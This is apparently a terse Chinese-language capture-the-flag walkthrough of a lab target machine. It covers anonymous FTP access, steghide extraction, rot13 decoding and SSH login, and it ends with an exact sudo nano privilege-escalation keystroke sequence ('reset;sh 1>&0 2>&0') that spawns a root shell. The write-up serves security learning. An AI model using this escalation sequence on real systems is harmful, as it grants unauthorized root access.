確認靶機
掃描靶機發現ftp
Anonymous? 的A大小寫都可以
查看文件
解密
登錄網頁
點擊about us會下載一個壓縮包
使用工具提取
steghide info 目標文件??????? //查看隱藏信息
steghide extract -sf 目標文件??????? //提取隱藏的文件
steghide embed -cf 隱藏信息的文件 -ef 隱藏的信息/文件??????? //隱藏信息/文件
密碼為sudo
rot13解密
登錄ssh
?
?
發現賬號密碼
-l 顯示出自己(執行 sudo 的使用者)的權限
nano提權
nano提權步驟
1、sudo nano??? //回車
2、ctrl+r??? ctrl+x??? //這里不要回車,輸完下面的再回車
3、reset;sh 1>&0 2>&0??? //回車完沒有什么變化,直接輸入whoami驗證一下就可以了
)